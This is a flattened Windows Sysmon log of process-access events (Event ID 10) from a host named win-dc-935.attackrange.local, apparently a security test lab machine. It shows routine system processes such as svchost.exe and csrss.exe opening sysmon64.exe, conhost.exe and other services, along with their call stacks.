13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007802Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007801Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007800Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007799Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007798Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007797Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007796Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007795Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85F5-5FCF-5401-000000009101}4108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007794Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85F5-5FCF-5301-000000009101}4160C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007793Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007792Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8541-5FCF-1000-000000009101}11561224C:\Windows\system32\svchost.exe{10ACEC4A-85F5-5FCF-5301-000000009101}4160C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007791Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007790Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007789Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007788Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007787Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007786Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007785Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007784Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007783Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85F5-5FCF-5101-000000009101}5084C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007782Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8541-5FCF-1000-000000009101}11562120C:\Windows\system32\svchost.exe{10ACEC4A-85F5-5FCF-5101-000000009101}5084C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007781Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007780Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007779Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007778Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:05.317{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007777Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 